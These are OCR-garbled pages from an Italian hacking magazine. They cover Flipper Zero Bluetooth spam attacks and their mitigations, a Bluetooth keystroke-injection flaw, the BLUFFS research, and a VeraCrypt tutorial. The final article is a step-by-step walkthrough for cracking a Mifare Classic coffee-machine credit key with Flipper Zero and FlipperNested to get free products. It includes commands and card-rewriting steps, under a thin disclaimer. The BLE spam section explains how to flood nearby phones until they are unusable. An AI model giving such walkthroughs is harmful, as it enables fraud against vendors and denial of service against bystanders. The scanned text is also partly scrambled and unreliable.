scadente ripreso da sala 
cinema. 

Insomma, una miscellanea di 
cose derivanti da una sola 
cosa: tutti i video sono stati 
scaricati dal Web, com'è ovvio 
che sia. E qui arriviamo alla 
domanda fondamentale: ha 
senso acquistare una chiavetta 
USB contenente dei film o delle 
serie TV che possono essere 
scaricate da Internet? La 
risposta non può che essere 
una: ovviamente no. “No” 
perché, questa tipologia di 
acquisto non è affatto legale e, 
soprattutto, non vi è alcuna 
garanzia di ricevere a casa il 
materiale che è stato pagato 
in anticipo. Uomo avvisato! 
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UL BLUETOOTH! 


Viene usato per inondare di notifiche gli smartphone Android e i0S 
rendendoli inutilizzabili. Al malintenzionato gli basta aggiornare 
il Flipper Zero con il firmware Xtreme. Svelati i retroscena 


IN BREVE 


C'è chi usa il Flipper Zero 
per rendere inutilizzabili 

i dispositivi Android e iOS 
DIFFICOLTÀ 


GLOSSARIO 
DI BASE 


ATTACCO FLOOD 


Questo tipo di attacco 
informatico rientra nelle 
tipologie più frequenti, 
consiste nell'invio ai 
dispositivi/servizi presi 
di mira di un flusso 


continuo di traffico 
“fasullo". L'obiettivo è 
semplice, portare i 
device a saturazione, 
rendendoli di fatto 
inutilizzabili. 


el mondo sempre più 
interconnesso di oggi, 
la sicurezza dei 
dispositivi mobili è 
diventata una preoccupazione 
primaria. Un recente sviluppo 
nel firmware Xtreme per Flipper 
Zero ha sollevato ulteriori 
interrogativi sulla vulnerabilità di 
iOS, Android e Windows agli 
attacchi Bluetooth. 
In questo articolo, esploreremo 
l'evoluzione delle capacità di 
spam Bluetooth e come Flipper 
Zero può essere utilizzato per 
inviare messaggi indesiderati 
verso smartphone e affini, 
simulando la ripetuta richiesta di 
accoppiamento Bluetooth da 
parte di dispositivi noti (/BL Buds 
Pro, JBL Live 300TWS, JBL Flip 6, 
Bose NC 700 e Pixel Buds) con una 
frequenza tale da rendere 
complicato il normale utilizzo del 
dispositivo. 


ATTACCHI SPAM 

Se fino a qualche tempo fa gli 
attacchi spam Bluetooth erano 
limitati principalmente a 
dispositivi iIOS 17, ora, gli 
sviluppatori del firmware Xtreme 
per Flipper Zero hanno 


introdotto un aggiornamento 
dell'applicazione BLE Spam, che 
consente di sfruttare il bug nella 
sequenza di accoppiamento di 
dispositivi Bluetooth Low Energy 
- una tecnologia wireless a corto 
raggio utilizzata per collegare 
dispositivi vicini tra loro, come 
smartphone, smartwatch e 
dispositivi indossabili - per 
attaccare anche smartphone 
Android e finanche PC e notebook 
equipaggiati con Microsoft 
Windows. 


BLUETOOTH LOW ENERGY 
Ma come funziona nello specifico il 
Bluetooth Low Energy - BLE? | 
dispositivi BLE trasmettono 
periodicamente piccoli pacchetti di 
dati contenenti informazioni sul 
dispositivo, come il suo nome e il 
tipo di servizio offerto; i dispositivi 
BLE che desiderano connettersi ad 
altri cercano periodicamente tali 
pacchetti e quando un dispositivo 
BLE ne trova uno, tenta la 
connessione al dispositivo che lo 
ha trasmesso. 

Una volta che un dispositivo BLE è 
connesso a un altro dispositivo 
BLE, i due possono scambiare dati 
adoperando il Protocol Data Unit 


(PDU), una struttura dati 
espressamente progettata per 
ridurre al minimo il consumo 
energetico. 

Nel momento in cui un 
dispositivo BLE non ha più 
bisogno di essere connesso a 


risparmiare energia. | fitness 
tracker utilizzano il BLE per 
monitorare l'attività fisica, 
come i passi, la distanza 
percorsa e le calorie bruciate, 
mentre i dispositivi smart 
home lo utilizzano per 
comunicare con altri device 


intelligenti come lampadine e 
termostati; la tecnologia BLE è 
utilizzata da Apple nel suo 
ecosistema di prodotti e 
servizi, da Microsoft con 
Windows Swift Pair e da 
Google con lo standard 


un altro, può disconnettersi e 


©) 


Sei stato invitato a unirti a 


Flipper-Xtreme 


Online: 4.013 @® 22108 Membri 


proprietario Fast Pair. 


® Flipper-Xtreme Ne XÉ Canali e ruoli 
ET) Personalizza Sfogliacanali 3 


pere domanda di personalizzazione 


* Guida del server 


Tesi What do you want to get notified for? 


*«{ Server Announcements eg Devupdates 
LVM/POOL/VERIFYO 


E verify-here dr 


tt verify-rules 


IVAR/OPT/FIRMWARE/ 


tè dev-updates 


download, gli smanettoni da https://flipper-xtre.me 


cliccano su Discord, e seguono le indicazioni a video. 


©) 


L'INSTALLAZIONE 


Una volta collegato il Flipper alla porta USB del PC lo 
smanettone avvia l'app qFlipper 
https://flipperzero.one/update), poi clicca su Install from 


ile e seleziona il firmware scaricato, procede cliccando su 


NSTALL e attende il termine dell'aggiornamento il cui 
avanzamento è mostrato da una progress bar. 


Procedono con un clic su Canali e ruoli e su Dev 
Update, quindi sulla voce dev-updates sotto /var/opt 
irmware; nella schermata in basso individuano l'ultima 
oce Build Succeeded! cliccando la voce interna 
Download Firmware TGZ e visitando il sito proposto nel 


popup che avvierà il download. 


erminata l'installazione del firmware (sul display del 
Flipper Zero verrà mostrata la scritta Xtreme Updated), 


lo smanettone sblocca il Flipper cliccando sulla freccia 
destra del tastierino frontale, quindi procede con la 
selezione dell’applicazione che consente di spammare i 


dispositivi Bluetooth nelle vicinanze 


L'APP CHE SPAMMA! COME USANO BLE SPAM 


diverse voci: Apps, RFID, Infrared, SubGHz, 
FCm GPIO. Il tool "spamma Bluetooth" utilizzato 
Flipper o adoperano l'interfaccia software di gFlipper. 
l 


€) 


THE KITCHEN SINK! ATTACCO BLE IN CORSO... 


Apple risolve parzialmente il problema con iO0S 17.2 


ATTACCO DOS SUL BLUETOOTH! 


Come proteggersi dall'attacco 


Li portata radio Bluetooth del Flipper Zero si affrontare questa vulnerabilità sarà quindi 
estende fino a circa 50 metri; quindi un necessario disattivare temporaneamente la 
malintenzionato dovrà trovarsi in prossimità funzionalità Bluetooth sul proprio dispositivo 
ravvicinata della vittima per portare a termine le qualora dovessero manifestarsi un numero 

sue malefatte. Ciò che preoccupa in questo tipo eccessivo di notifiche di accoppiamento con 

di attacco è l'assenza attuale di soluzioni dispositivi Bluetooth sconosciuti. Vediamo come 
pratiche per proteggere i dispositivi. Per fare su Android, iOS e Windows. 

SA el al 1 MOBILE 4G @ 53% 8): 

« — Nearby Share E uscinaereo 


Wi-Fi 


> 601 e 


Non in riprod... 


O Device name 
Bluetooth 


h FLAIR Cellulare 
Device visibility 
No one can share with you until you @ ) 


make yourself visible Hotspot personale 


VPN 
Data 


Data may be used for small files 


(charges may apply) Full im- 


mersion 


Notifiche 


Show notification Suoni e feedback aptico 


When devices are sharing nearby 


€ 


Full immersion 


©) Tempo di utilizzo 
Gli accessori e le scene che aggiungi 


Nearby Share uses Bluetooth scanning to find È = a 
SRL SEU CA ALI all'app Casa verranno mostrati qui. 


nearby devices. . 
If “Show notification” is turned on, Bluetooth Generali 
scanning is used to notify you if someone wants to i 
share with you, even when Nearby Share is turned | Centro di Controllo 
off. 


Learn more about Nearby.Share de: Schermo e luminosità 


SU ANDROID 


Da Impostazioni > Google + Device Da Impostazioni + Bluetooth deflaggare la voce Bluetooth, oppure, 
& Sharing > Nearby Share, direttamente dal centro di controllo (swipe verso il basso dall'angolo destro 


deflaggare la voce Show notification. dello smartphone), “spegnere” l'icona del Bluetooth. 
e Impostazioni 
@ Home Bluetooth e altri dispositivi 
[trova unrimpostazione____F] d Aggiungi dispositivo Bluetooth o di altro tipo eva 
Dispositivi 
Bluetooth 
| Sf Bluetooth e altri dispositivi @D attivato 


& Stampanti e scanner ì 
Altre ini 


O Mouse Mouse, tastiera e penna 


El Touchpad SE Racene! Imposte 


Disposil 


Selezionare il pulsante Start, quindi Impostazioni + Dispositivi + Bluetooth e altri dispositivi, poi selezionare il 
flag Bluetooth per attivarlo o disattivarlo. Alternativamente, se la propria versione di Windows lo prevede, aprire 


Impostazioni + Bluetooth e dispositivi nel menu a sinistra, cliccare sulla voce Dispositivi, quindi scorrere verso il 
basso fino a Impostazioni dispositivo e deflaggare la voce Mostra notifiche per connetterti utilizzando Swift Pair. 


49 


HOW T0 


RE 


“N° Gli smanettoni lo fanno 
SI anche senza Flipper Zero! 


luetooth-LE-Spam 
(https://github.com/ 
simondankelmann/ 
Bluetooth-LE-Spam) è 
un'applicazione Android 
sviluppata da Simon 
Dankelmann. L'app emula la 
funzionalità spam BLE di Flipper 
Zero con firmware Xtreme, 
consentendo a qualsiasi 
z smartphone Android di 

ASSE trasmettere pacchetti BLE che 
imitano vari dispositivi, 
potenzialmente inondando gli 
smartphone e notebook posti 
nelle vicinanze con richieste di 
connessione fasulle con un a 
frequenza tale da bloccarne il 
funzionamento. 
L'app può inviare richieste di 
connessione intervallate da 


appena un secondo, colpendo 
dispositivi che utilizzano i 
protocolli Fast Pair su Android o 
Swift Pair su Windows [figura #1]. 
Bluetooth-LE-Spam è 
fortunatamente limitata dalle 
restrizioni intrinseche di Android, 
in particolare dalle routine che 
gestiscono e limitano la potenza 
di trasmissione del segnale 
Bluetooth. Queste limitazioni 


riducono la portata effettiva e —. 


l'impatto degli attacchi. Tuttavia, ... 
rappresentano comunque un 
pericolo, poiché, anche se il 
segnale non può essere 
trasmesso oltre i 50 metri, come 
nel caso di Flipper Zero, può 
comunque influenzare diversi 
dispositivi nelle vicinanze, 
rendendoli inoperativi. 


(ere METE 


Advertising: Device 1 


Include Device Name 


Advertised successfully 
Advertising: Device 1 
Advertised successfully 
Advertising: Device 1 
Advertised successfully 
Advertising: Device 9 
Advertised successfully 
Advertising: Device 7 
Advertised successfully 
Advertising: Device 6 


STOP ADVERTISING 


Kevboard Spoofing su Android, i0S, macOS e Linux 


empre nel contesto 

del Bluetooth, al 
momento della stesura 
di questo articolo, il 
ricercatore di sicurezza 
Marc Newlin ha 
individuato una 
vulnerabilità che 
colpisce Android, iOS, 
macoOS e Linux, 
permettendo l'invio di 
comandi arbitrari ai vari 


dispositivi mediante 
keystroke-injection. In 
particolare, un 
dispositivo 
correttamente 
configurato (ad 
esempio, un computer 
Linux con adattatore 
Bluetooth standard) può 
simulare una tastiera 
Bluetooth, inviando una 
richiesta di 


accoppiamento che 
viene automaticamente 
convalidata dal sistema 
di destinazione senza 
notifiche all'utente. Una 
volta accoppiati, 
l'attaccante può inviare 
tasti arbitrari al 
dispositivo della vittima, 
inclusi comandi per 
l'apertura di applicazioni 
e l'invio di comandi di 
sistema. 

Android sembra essere 
il sistema più 
vulnerabile a questo 
tipo di attacco (il bug è 
presente fin dalla 
versione 4.2.2 di 
Android, ovvero da oltre 
dieci anni!), richiedendo 
solo che il Bluetooth sia 
attivo. Newlin ha messo 
sotto torchio sette 
smartphone con diverse 
versioni del sistema 
operativo (Android 4.2.2, 
Android 6.0.1, Android 


10, Android 11, Android 
13 e Android 14) 
scoprendo la 
vulnerabilità di tutti i 
dispositivi. 

Per l'attacco su sistemi 
Apple macOS e iOS è 
richiesto che il 
Bluetooth sia attivo e 
che una Magic Keyboard 
sia stata 
precedentemente 
accoppiata al 
dispositivo; il ricercatore 
ha avuto modo di 
verificare la vulnerabilità 
nei sistemi iOS 16.6 e in 
macOoS Monterey 12.6.7 
(x86) e Ventura 13.3.3 
(ARM). È comunque 
presumibile che una 
gamma più ampia di 
versioni di macOS e iOS, 
oltre ai sistemi correlati 
come iPadOS, tvOS e 
watchOS, possano 
essere vulnerabili a 
questo tipo di attacchi. 


ATTAGCO DOS SUL BLUETOOTH! 


BLUFFS, la falla presente in miliardi 


di dis 


ositivi Bluetooth! 


Il problema di sicurezza potrebbe consentire il dirottamento delle connessioni di tutti 
i device che utilizzano il Bluetooth da 4.2 a 5.4! 


empre in ambito Bluetooth vale 

la pena spendere qualche parola 
su un'incredibile scoperta effettuata 
da alcuni ricercatori di Eurecom 
(centro di ricerca nelle scienze 
digitali). Nello specifico, gli esperti 
hanno identificato e dimostrato 
gravi vulnerabilità di sicurezza che 
affliggono le trasmissioni Bluetooth 
(Bluetooth Core da 4.2 a 5.4), che 
potrebbero consentire il 
dirottamento delle connessioni dei 
dispositivi connessi, inclusi 
notebook e smartphone. Gli 
attacchi, noti come BLUFFS 
(Bluetooth Forward and Future 
Secrecy), sfruttano due falle di 
sicurezza e riguardano miliardi di 
dispositivi. Gli attacchi, testati su 
diciassette diversi chip Bluetooth 
(vedi figura), si concentrano sulla 
derivazione unilaterale e ripetibile 
della chiave di sessione, 
permettendo agli aggressori di 
impersonare dispositivi e attuare 
attacchi di tipo man-in-the-middle 
[figura #2]. Il toolkit BLUFFS, 
condiviso su GitHub (https://github. 
com/francozappa/bluffs) dai 
ricercatori, include un Checker 
scritto in Python 3, le patch ARM, un 
Parser e dei file PCAP. | test condotti 
su vari dispositivi, tra cui 
smartphone, auricolari e laptop, 
confermano la suscettibilità di tutti 
questi dispositivi ad almeno tre dei 
sei attacchi BLUFF [Tabella #1]. 


gura #2 


chip sottoposti 


fi 


Device(s) BIv A1 A2 


A3 Ad AS A6 


sta 
Bose SoundLink!® 42 
Thinkpad X1 3rd gen 42 


CSR n/a Logitech BOOM 3' 42 


SC Victims 
CYW920819EVB-02 5.0 
Logitech MEGABLAST 4.2 
Mi 10T* 52 
iPhones 12*, 13* 52 
Pc 30-0* 


Qualcomm Sna 
Qualcomm Snapdragoi 


la test con annessi 
evice che li 

utilizzano, specifica 
luetooth e 
ulnerabilità ai sei 
ipi di attacchi 
LUFFS (A1-A6). 

Fonte: Eurecom 


XOMOM OX XXX 


Come funzionano gli attacchi? 

Si basano su quattro vulnerabilità 
architetturali legate alla creazione di 
sessioni Bluetooth, tra cui la possibilità 
per un aggressore di guidare 
unilateralmente la diversificazione 
delle chiavi. Nella figura che segue lo 
schema temporale dell'attacco; nello 
specifico, al tempo t1 viene forzata la 
chiave di sessione SKC mediante un 
attacco MitM in cui vengono catturati i 
messaggi scambiati dalle vittime; al 
tempo t2 viene compromessa e 
recuperata la chiave di sessione 
tramite attacco brute force, viene così 
decrittato il traffico veicolato altempo 


t1; altempo t3 la chiave SKC 
trafugata viene utilizzata per 
personificare una vittima e 
compromettere la segretezza futura 
[figura #3]. Bluetooth SIG, 
l'organizzazione che sovrintende lo 
standard Bluetooth, è stata 
informata degli attacchi con 
comunicazioni inviate anche a 
Google, Intel, Apple, Qualcomm e 
Logitech, che stanno lavorando su 
soluzioni. Attualmente, gli utenti non 
possono risolvere autonomamente 
queste vulnerabilità, e la risoluzione 
dipenderà da modifiche apportate 
dai produttori dei dispositivi. 


figura #3 


Force SK | | Compromise SKc, | | Reuse SK_ after t2, ipo scandito da tre 
via a MitM | {break past sessions broken future - - 
(A3 or A6), since t,, broken secrecy (Al, A2, A3, momenti chiave, tl, IZ @ 
sniff forward secrecy A4, A5, and A6) 


Fonte: Eurecom 


—r_iuir_rd 


ti = t 


time 


Spoofing a LSC Central to a victim Peripheral 


I NOMENCLATURA ATTACCO | miporosiaDiattActo — — [e|o)el\kidl 
AI - 


A2 
AI 
A& 
AS 
AG 


Spoofing a LSC Peripheral to a victim Central 
MitM session where one victim supports LSC 
Spoofing a SC Central to a victim Peripheral 
Spoofing a SC Peripheral to a victim Central 
MitM session where the victims support SC 


Le sei tipologie di attacchi BLUFFS messi a punto dai ricercatori Eurecom. 


E onto 


RYPTO-SIMMETRI 


BLOCCHI DI BI 


Come occultare un testo in chiaro, rendendolo visibile solo a chi 
possiede le credenziali giuste. Fai tutto con un software gratuito 


IN BREVE 


Come utilizzare 
VeraCrypt per creare 
un pacchetto criptato 


DIFFICOLTÀ 
AT TR 
IS i 


GLOSSARIO 
DI BASE 


Acronimo di 
Substitution-BOX o 
Scatola di sostituzione. 
Elemento fondamentale 
degli algoritmi a base 
simmetrica, serve 

per nascondere le 
correlazioni tra 


messaggi in chiaro e 
rispettivi testi cifrati. 


Acronimo di 
Permutation-BOX. Il suo 
compito è mescolare le 
informazioni. Sfruttando 
un preciso schema. 


a parola simmetria evoca da 
sempre precisione e conformità 
e lo fa anche nell'ambito della 
crittografia. Il sistema 
simmetrico, infatti, prevede che un 
testo in chiaro venga occultato usando 
la stessa chiave che serve per 
decifrarlo. Gli attori del processo sono 
quattro: il mittente (A), il destinatario 
(B), la chiave che serve per cifrare il 
messaggio (C) e l'algoritmo utilizzato 
per nasconderlo (Z). Tutto questo 
porterà alla creazione di un testo 
illeggibile (T) a chi non ha la chiave 
giusta per renderlo comprensibile. Il 
punto forte della crittografia 
simmetrica sono gli algoritmi che 
vengono usati per nascondere il 
messaggio. Possiamo inserirli in due 
grandi insiemi: quelli che 
appartengono al metodo a blocchi e 
quelli inseriti nel gruppo dei sistemi a 
flussi di cifre. La differenza è che i 
primi cifrano un blocco al cui interno 
sono inseriti un determinato numero 
di bit, i secondi lavorano su una 
singola informazione. 
In questa guida vedrete come creare 
un contenitore criptato (con il metodo 
a blocchi) al cui interno si può 
archiviare qualsiasi documento. Il tutto 
verrà realizzato ricorrendo a 
VeraCrypt, uno strumento che 
permette di impostare una cifratura di 


volumi e partizioni con diverse 
tipologie di algoritmi. Un software 
potente, considerato tra i migliori in 
circolazione e consigliato anche dal 
collettivo Anonymous. 


IL RE DELLA CRITTOGRAFIA 

Gli algoritmi che usano la cifratura a 
blocchi sono davvero tanti. Uno dei più 
importanti è l'AES, vale a dire 
l'Advanced Encryption Standard. 
Questo applica una serie di operazioni 
matematiche in sequenza su una base 
di dati, sfruttando quello che gli 
analisti conoscono come Principio di 
confusione e diffusione. Confusione 
perché garantisce che tra testo cifrato 
e chiave crittografica ci sia un livello di 
correlazione basso, così da ridurre al 
minimo la possibilità che un attaccante 
colleghi questi due elementi. 
Diffusione, invece, si riferisce alla 
capacità di rendere impermeabile 
l'algoritmo ad attacchi che sfruttano 
una base statistica. 


L'algoritmo 

di cifratura AES 

si basa sul principio 
di confusione 

per aumentare 

la sicurezza globale 


—_ CRITTOGRAFIA SIMMETRICA 


CREARE UN CONTENITORE CRIPTATO PER DOCUMENTI 


Inuselinus-VirtualBox - $ sudo add-apt-repository ppa:unit193/encryption 

[sudo] password di linus: 

Stai per aggiungere il seguente PPA: 

https://www.veracrypt.fr/ 

VeraCrypt - Open source disk encryption with strong security for the Paranoid, base 


ld on TrueCrypt. 


cryptsetup - Updated to work with VeraCrypt volumes. 
Maggiori informazioni: https://launchpad.net/-unit193/+archive/ubuntu/encryption 
Premi Invio per continuare o Ctrl+C per annullare 


Executing: /tmp/tmp.EGNQXU240I/gpg.l.sh --keyserver 
hkp://keyserver.ubuntu.com:80 
--recv-keys 


: chiave B58A653A: chiave pubblica "Launchpad PPA for Unit 193" importata 
: Numero totale esaminato: 1 
importate: 1 (RSA: 1) 


INSTALLAZIONE FACILE 

\VeraCrypt può essere installato su Linux, Windows e 
Mac. In questo tutorial, abbiamo usato una macchina 
con Linux Mint e da Terminale abbiamo inserito i 
comandi che seguono seguiti dalla pressione del tasto 
Invio: sudo add-apt-repository; ppa:unit193/encryption; 
sudo apt-update; sudo apt install veracrypt. 


Select this option if you want to create a normal VeraCrypt 
volume. 


Volume Type 


© Standard VeraCrypt volume 


Hidden VeraCrypt volume 

It may happen that you are forced by somebody to reveal the 

pazsvotd to an eocivpaee Volume: There ara mary situatiore 
STANDARD O NASCOSTO? 
Con la voce Standard VeraCrypt volume viene creato un 
contenitore che decriptiamo con una password o un file 
chiave. Se scegliamo Hidden VeraCrypt Volume, 
realizziamo un doppio container nascosto. Il primo serve 
da specchietto per le allodole, il secondo da vera 
cassaforte. Se qualcuno ci estorce la prima password, non 
sarà comunque in grado di accedere all'archivio nascosto 
contenuto nel box fasullo. 


Volume Format 


Random Pool 
Header Key: 
Master Key: 


Randomness Collected From Mouse Movements 


Done Speed Loft 


IMPORTANT: Move your mouse as randomby as possible within this 
windon: The longer you move it the better. This significantiy 
Increases the cryptographic strengih of the encrypion keys, Then 
click Format to create the volume. 


<Prev Format Annulla 


ENTROPIA PER LA SICUREZZA! 

Impostiamo ora la dimensione e la chiave, il filesystem e 
diamo il via alla formattazione e alla preparazione del 
container. VeraCrypt sfrutta l'entropia generata dal 
movimento casuale del mouse: spostiamolo quindi senza 
sosta fino a quando la barra sotto Randomness Collected 
From Mouse Movements non è completa. 


——& 


) Create an encrypted file container 


Creates a virtual encrypted disk within a file. Recommended for 
inexperienced users. 


Create a volume within a partition/drive 


Formats and encrypts a non-system partition, entire external or 
secondary drive, entire USB stick, etc. 


CONTENITORE O VOLUME? 

Premiamo Create Volume, quindi scegliamo la voce 
Create an encrypted file container. Questa funzione 
permette di generare un contenitore criptato al cui 
interno archiviare i documenti. Se invece vogliamo 
sfruttare un intero volume formato da un disco fisso, 
spuntiamo Create a volume within a partition/drive. 


Encryption Algorithm 
AES 
Serpent 
Twofish 
Camellia 
Kuznyechik 
AES({Twofish) 


AES(Twofish{Sernent)) 


CRIPTAGGIO A CASCATA 

Il passo successivo richiede di scegliere un file o un drive 
da usare come contenitore. Possiamo crearne uno 
nuovo di qualsiasi formato. In seguito scegliamo 
l'algoritmo di criptaggio tra i tanti disponibili. 

Possiamo utilizzare una struttura a cascata con AES, 
Twofish, Serpent, che lavora criptando con tutti e tre. 
Scegliamo l'algoritmo di hash tra SHA-512, Whirlpool, 
SHA-256 o Streebog. 


DECRIPTAZIONE VELOCE 

Completata la formattazione, il volume criptato è pronto 
all'uso. Per decriptarlo premiamo il pulsante Select File. 
Nella finestra centrale scegliamo un numero a caso nella 
colonna Slot (nel nostro caso 5), quindi premiamo Mount. 
Si apre la finestra in cui dobbiamo inserire la password. 
Dopo averla inserita, facciamo clic su OK. 


SE pon To 


AFFE E MERENDIN 
RATI 


Vi è mai venuta voglia di capire se esiste un metodo per ottenere 
un caffè dal distributore senza farvi scalare il credito dalla 
chiavetta aziendale? Beh, a noi sì. Ecco com'è andata 


IN BREVE 


Come usare il Flipper 
Zero per sferrare un 
attacco ai tag NFC 


DIFFICOLTÀ 


PRE 


ATTENZIONE! 


È importante tenere a mente 

O O la chiavetta dei di- 

stributori del caffè costituisce 

un'azione illecita e puo com” 
portare conseguenze legali. Lo 
scopo di questa guida è pura- 
mente informativo e mira ELE) 
volontà di apprendere. È re- 
sponsabilità di ciascuno fare 
la scelta corretta e segnalare 
prontamente al rifornitore di 
caffè la presenza di queste 
vulnerabilità. 


on il solo scopo di “farci offrire 
un caffè”, ci siamo messi 
all'opera utilizzando il nostro 
amato e famoso “coltellino 
svizzero degli hacker”, ovvero il Flipper 
Zero. Che dire? Non è stata una 
passeggiata ma ci siamo riusciti... 


PROTOCOLLO 

DI COMUNICAZIONE 

Partendo dalle informazioni presenti 
sul pannello frontale del lettore, 
abbiamo fatto una ricerca su Internet 
riguardo al produttore e abbiamo 
trovato subito che lo standard 
utilizzato è il NFC con protocollo di 
cifratura Mifare per la comunicazione 
bidirezionale tra lettore e chiavetta. 
Non potevamo aspettarci niente di 
meglio da dare in pasto al nostro 
Flipper Zero! 

Nel nostro caso specifico parliamo di 
Mifare Classic 1K: sul Web si trovano 
moltissime informazioni dettagliate su 
questo argomento. Per i nostri scopi, ci 
è sufficiente sapere che la memoria 
interna della chiavetta del caffè, nella 
quale vengono conservati tutti i dati, è 
di 1Kb (1,024 bytes) ripartiti 
equamente in 16 settori; ognuno di 
questi è protetto da una cifratura a due 
chiavi, dette A e B. Ogni chiave può 
essere programmata per consentire 


operazioni come lettura, scrittura, 
aumento dei blocchi di valore e così 
via. Il nostro obiettivo di emulare la 
chiavetta del caffè, pertanto, si traduce 
nel riuscire a decifrare tutte le 32 chiavi 
dei 16 settori. Per arrivare a leggere il 
contenuto della nostra chiavetta, è 
quindi necessario individuare almeno 
una vulnerabilità di tale protocollo. Tre 
sono i principali tipi di vulnerabilità più 
comuni che possono essere sfruttate 
per la decifrazione delle chiavi A e B di 
un TAG NFC di tipo Mifare Classic 1K: 

* Nested attack 

* Static nested attack 

* Hard nested attack 

Il Flipper Zero sembra quindi lo 
strumento adatto per un'operazione 
come questa: riesce a leggere tag NFC 
di diverse tipologie e, se 
opportunamente configurato, 
consente di sferrare un attacco come 
quelli appena descritti. Mettiamoci 
subito al lavoro! 


SCELTA DEL FIRMWARE 
Innanzitutto, facciamo anche una 
scelta accurata del firmware da 
utilizzare per il Flipper Zero, scegliendo 
Xtreme (flipper-xtre.me). Il confronto tra 
questo firmware e il RogueMaster ed 
Unleashed sembra di gran lunga vinto, 
in quanto a collezione di tool e 


figura #1 


Mifare Classic 1K 

UD: f4 GE 69 C2 5160 SA 
Eeys Found: 132 

Sectors Read: 116 


funzionalità preinstallate in questa 
distribuzione. In effetti, una volta 
installato, il Flipper Zero presenta 
già tutte le app e i tool necessari al 
nostro scopo. Effettuiamo, 
dunque, una copia di backup (per 
sicurezza) dell'attuale firmware e 
scheda SD del nostro Flipper Zero 
e procediamo con l'installazione 
del nuovo. Dalla pagina principale 
segnalata sopra, premiamo sul 
pulsante in alto a destra Install e 
seguiamo la procedura. 
Colleghiamo il Flipper Zero al PC, 
premiamo Connect e 
selezioniamo la porta COM 
suggerita. Nella pagina successiva 
selezioniamo la versione: noi 
abbiamo scelto l'ultima (XFW-0051 
del 01-09-2023). Premiamo su 
Flash e attendiamo la fine delle 
operazioni. 


Adesso la parte più interessante: il 
recupero delle chiavi di 
crittografia. Seguiamo i passi: 


* Lettura del TAG NFC 
Sovrapponiamo Flipper Zero alla 
chiavetta del caffè e, 
successivamente, procediamo con 
la lettura dei TAG NFC (percorso 
su Flipper Zero: Main Menu/NFC 
/Read). Accertiamoci che sia il 
Flipper Zero che la chiavetta del 
caffè siano appoggiate su un 
tavolo e non subiscano movimenti 
durante tutta la procedura. È 
necessario che almeno una chiave 


CAFFÉ E MERENDINE GRATIS 


figura #2 


HNonces collected 


di crittografia venga 
correttamente letta, altrimenti il 
procedimento non può 
continuare. Normalmente, si 
tratta del primo settore che 
contiene l'UID, BCC e i dati del 
produttore. La prima lettura 
completa può durare anche un 
paio di ore, dipende dal dizionario 
preinstallato nella versione del 
firmware. Nel caso in cui almeno 
una chiave venga trovata, 
dovremmo ottenere sul display di 
Flipper Zero un messaggio simile a 
questo: [figura #1]. 

Siamo riusciti a ottenere le 
seguenti informazioni: 

* Tipo specifico di protocollo 

* UID (Unique Identification Number) 
* Chiavi lette 

* Settori letti 

Attraverso il pulsante More, 
salviamo il file appena letto. Noi lo 
abbiamo salvato con il nome 
“Nested_hj.nfc”. Una chiave (e un 
settore) è stata letta 
correttamente; quindi, possiamo 
continuare nel nostro 
procedimento. 


* Collezionare le Nonces 

In crittografia, un “Nonce” è un 
valore numerico che può essere 
utilizzato una sola volta in una 
comunicazione crittografica. 
Spesso si tratta di un numero 
casuale o pseudo-casuale emesso 
in un protocollo di autenticazione 
per garantire che le vecchie 
comunicazioni non possano 


essere riutilizzate in attacchi di 
replay. Procediamo con la lettura 
del reader del distributore 
avvicinando il Flipper Zero al 
lettore di chiavette sul distributore 
automatico (percorso: Main 
Menu/NFC/Saved/Name of the 
saved file (“Nested_hj.nfc") / 
Detect reader). Flipper Zero 
inizierà a collezionare le nonces ed 
è una procedura molto veloce, 
della durata di pochi secondi. Una 
volta completato, premiamo il 
pulsante per salvare (DONE). 


* Applicare il Nested Attack 
Sovrapponiamo Flipper Zero alla 
chiavetta del caffè e avviamo il 
tool Mifare Nested (percorso: 
Main Menu/Apps/NFC/Mifare 
Nested). Questa fase può durare 
qualche decina di minuti. AI 
termine della procedura, se 
questa non ha dato errori, 
comparirà sullo schermo di Flipper 
Zero un messaggio come quello 
sotto: [figura #2]. 


* Il tool di decrittazione 

In questa fase è necessario avere 
un PC con installato Python3: la 
versione richiesta è a 64 bit e 
almeno la 3.8 o superiore. Se non 
installata, per installare Python su 
Windows basta recarsi sul sito 
ufficiale http:/A/www.python.org e 
scegliere il download adatto al 
proprio sistema operativo, 
nell'ultima che trovate. 

A questo punto (noi abbiamo 
deciso di lavorare con Windows 
10), apriamo il terminale (cmd o 
power shell) con diritti di 
amministratore ed eseguiamo il 
seguente comando: 

python -m pip install 


FlipperNested 
oppure: 


DO 


python3 -m pip install 


FlipperNested 


oppure, se Python non è stato 
aggiunto al PATH delle variabili 
d'ambiente: 


py -m pip install FlipperNested 


* Decrittazione delle chiavi 
Connettiamo il Flipper Zero al PC 
assicurandoci che qualsiasi altra 
applicazione a esso legata sia 
chiusa. Dal terminale aperto, 
eseguiamo il seguente comando: 


FlipperNested 


oppure: 


python -m FlipperNested 


oppure: 


py -m FlipperNested 


Lo script farà una scansione 
approfondita e inizierà a cercare le 
chiavi. Il tempo necessario 
dipende molto dalla velocità del 
del proprio PC [figura #3]. 


* Aggiunta delle chiavi trovate 
Alla fine della sua elaborazione, lo 
script troverà le potenziali chiavi 
associate alla nostra chiavetta. 
Seguiamo il percorso: Main 


Nel momento in cui Flipper Zero emula un TAG NFC, il file 
“Nested_hj_hack" viene aggiornato con il nuovo stato dei dati. 
Ciò genera una desincronizzazione tra lo stato effettivo sul 
Flipper Zero e la chiavetta fisica del caffè. Per sincronizzare 
quest'ultima con lo stato dei dati sul Flipper Zero, utilizzare la 
funzione Write To Initial Card. In modo analogo, i dati della 
chiavetta del caffè possono essere modificati dopo 


Check found keys. Inizierà il 
controllo delle potenziali chiavi, 
l'applicazione scriverà quelle 
corrette nel dizionario utente e 
mostrerà quante nuove chiavi 
sono state aggiunte [figura #4]. 


* Verifica delle chiavi 

Ora bisogna ripetere il primo 
passo di questa guida. Alla fine 
della lettura della chiavetta si 
dovrebbero notare due 
miglioramenti: 

* Il dizionario di sistema utilizzato 
per l'attacco a brute force è 
aumentato di dimensione; 

* Il numero di chiavi e settori 
correttamente letti è aumentato 
rispetto alla prima lettura. 

Può succedere che il Flipper Zero 


fieura #4 


Menu/Apps/NFC/Mifare Nested/ 


non riesca a trovare subito tutte le 
chiavi necessarie. Se ancora non 
tutte le chiavi (e quindi settori) 
sono stati correttamente lette, è 
necessario procedere 
nuovamente a un Nested Attack 
ripetendo tutte le fasi viste in 
precedenza. L'obiettivo è quello di 
raggiungere la situazione indicata 
in figura sotto: [figura #5]. 
